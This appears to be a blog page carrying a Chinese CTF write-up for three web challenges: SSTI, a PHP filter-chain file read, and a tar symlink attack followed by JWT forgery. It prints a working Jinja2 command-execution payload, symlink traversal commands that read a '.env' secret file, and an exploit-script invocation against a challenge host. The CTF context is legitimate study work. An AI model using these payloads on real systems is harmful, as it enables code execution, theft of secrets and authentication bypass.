当前位置: 首页 > news >正文

春秋杯-WEB

SSTI

可以看到主页那里有个登录测试之后为ssti

{{4*4}}

fenjing梭哈即可得到payload

{{((g.pop.__globals__.__builtins__.__import__('os')).popen('cat flag')).read()}}

file_copy

看到题目名字为file_copy,

当输入路径时会返回目标文件的大小,
![[Pasted image 20250117160619.png]]

通过返回包,可以看到PHP版本为8.1.31

从而找到DownUnder CTF 2022 的题目

https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle#/

通过github脚本进行读取flag
https://github.com/synacktiv/php_filter_chains_oracle_exploit/tree/main?tab=readme-ov-file#/

python3 filters_chain_oracle_exploit.py --target http://eci-2ze4o9fodim6wmt5gbgp.cloudeci1.ichunqiu.com/ --file '/flag' --parameter path

运行得到flag

Gotar

先随便创建一个账号,然后登录。

创建一个软链接

ln -s ../../../.env links

然后将文件夹解压

tar -cf link.tar links

上传

通过代码审计可以得出链接位置

const (  uploadDir    = "./assets/uploads"  extractedDir = "./assets/extracted"  
)

一个为上传位置,另一个为解压位置

拼接得到软链接的路径

assets/extracted/2/links

得到key

然后进行jwt伪造

id改为1admin改成true。

得到flag

![[Pasted image 20250117153440.png]]

http://www.lryc.cn/news/522595.html

相关文章:

  • JavaEE:多线程初阶
  • Linux之文件系统前世今生(一)
  • 当设置dialog中有el-table时,并设置el-table区域的滚动,看到el-table中多了一条横线
  • Windows远程桌面网关出现重大漏洞
  • vue 前端优化性能优化方法
  • docker-compose部署kafka 3.3.1 kraft
  • 【Python】第二弹---深入理解编程基础:从常量、变量到注释的全面解析
  • [BrainShadow-V1] VR头戴设备统计报告
  • 跨境电商使用云手机用来做什么呢?
  • DAY23 使用具有通用性的队列
  • 汽车网络信息安全-ISO/SAE 21434解析(上)
  • 通用查询类接口开发的另类思路
  • uc/os-II 原理及应用(八) 系统裁减以及移植到51单片机-下
  • 职场沟通与行为
  • 【tailscale 和 ssh】当服务器建立好节点,但通过客户端无法通过 ssh 连接
  • Spark 之 Aggregate
  • 【JSqlParser】Java使用JSqlParser解析SQL语句总结
  • Linux下的dev,sys和proc(TODO)
  • 【Unity3D】利用Hinge Joint 2D组件制作绳索效果
  • Springer Nature——Applied Intelligence 投稿指南
  • 数据结构、数据类型、数字编码、字符编码:保姆级图文详解
  • DM适配连接kettle迁移工具(资源库+数据源配置)
  • WINFORM - DevExpress -> alertControl1提示信息框
  • STM32-串口-UART-Asynchronous
  • Nginx三种不同类型的虚拟主机(基于域名、IP 和端口)
  • Shell控监Kafka积压
  • element-ui textarea备注 textarea 多行输入框
  • Transformer创新模型!Transformer+BO-SVR多变量回归预测,添加气泡图、散点密度图(Matlab)
  • 大疆机场及无人机上云
  • 用Cursor生成一个企业官网前端页面(生成腾讯、阿里官网静态页面)